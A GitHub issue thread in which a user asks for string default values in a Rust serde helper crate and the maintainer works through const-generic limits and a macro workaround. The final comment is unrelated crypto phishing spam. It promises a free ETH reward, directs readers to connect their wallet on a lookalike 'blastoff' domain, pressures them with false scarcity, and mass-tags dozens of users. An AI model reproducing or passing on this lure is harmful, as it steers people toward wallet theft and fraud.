### ISSUE TITLE
[FEATURE] String support

### ISSUE THREAD

**Issue by ollyde** [alekspickle/serde_default_utils#1]
```
struct PlatformSettings {
    #[serde(default = "default_string::'some_String'")]
    minimum_client_version: String,
    max_sms_count: i64,
    max_user_count: i64,
}
```

Would be nice.

**Comment by olekspickle** [comment]
strings are tricky, let me see what I can do

**upd**: so i tried it but pretty quickly found out that approach with _const generic parameters_ is [pretty limited](https://doc.rust-lang.org/reference/items/generics.html#const-generics):

It looks like this workaround is not possible for strings and slices ATM.

It is possible to make some other, maybe proc macro that you can just wrap your value around, like:
```
struct PlatformSettings {
    #[serde(default_string("some_String"))]
    minimum_client_version: String,
    max_sms_count: i64,
    max_user_count: i64,
}

```

but I'm not that fluent in macro-fu unfortunately, if there is an idea I can use here, I'd welcome it

**Comment by olekspickle** [comment]
I played with it around, [this is what I came up with](https://play.rust-lang.org/?version=stable&mode=debug&edition=2021&gist=64b400608ac5234e6181bc73829125b8), but I'm not even sure it has any sense, since this approach only allows `&'static str` and `&'static [u8]`

I also started a [discussion](https://users.rust-lang.org/t/is-there-a-way-to-know-the-type-of-expr-in-macro-to-put-as-a-return-value-of-generated-function/105363) on users.rustlang to figure out if this is even possible or some solution is possible

**Comment by ollyde** [comment]
@alekspickle thanks!

**Comment by olekspickle** [comment]
So, I think I figured out more or less sane syntax for strings:
```
serde_default!(hey, "Hey dude");

...
#[serde(default = "default_hey")]
greeting: &'static str,
...

```

but raw slices are just unusable, if you have [1,2,3,4,5] as json value it will just fail to parse to &'static [u8] (expectedly so):
```
invalid type: sequence, expected a borrowed byte array
```

Which leads me to adding it for string slice only

**Comment by olekspickle** [comment]
My is guess 0.2.1 closes this, check it out and reopen if needed

**Comment by dhanyacp** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
Seokhyeon315, @ShrutiJ-01, @namreg, @neilwyh, @brainsoftca, @yabeen, @Johnnieyiii, @joena1o, @YukunXue, @wuyuesong, @zun-credinord, @yrong, @obsidianriver, @Daplug01, @niclaz, @JimmyWickets, @jiearthur, @Oyelowo, @hayatoVTA, @themanavpaul, @peinlcy, @metomjoseph, @sullya974, @Omeqagear, @AztiIluna, @maxtokka, @nailk, @shuaiguo0, @AI-Chef, @justinTsugranes, @ArvidHammarlund, @pes997, @OkiemuteGold, @Icarusiaz, @ayonliu, @gabrielcaiana, @vaginessa, @Yehonal, @fparisotto, @Podziuu, @yaobinwen, @dugufeiyu, @donaldxdonald, @shrnkld, @jameslea, @iggzq, @Lostein, @alex0112, @DeepMindDAO, @diegodisant
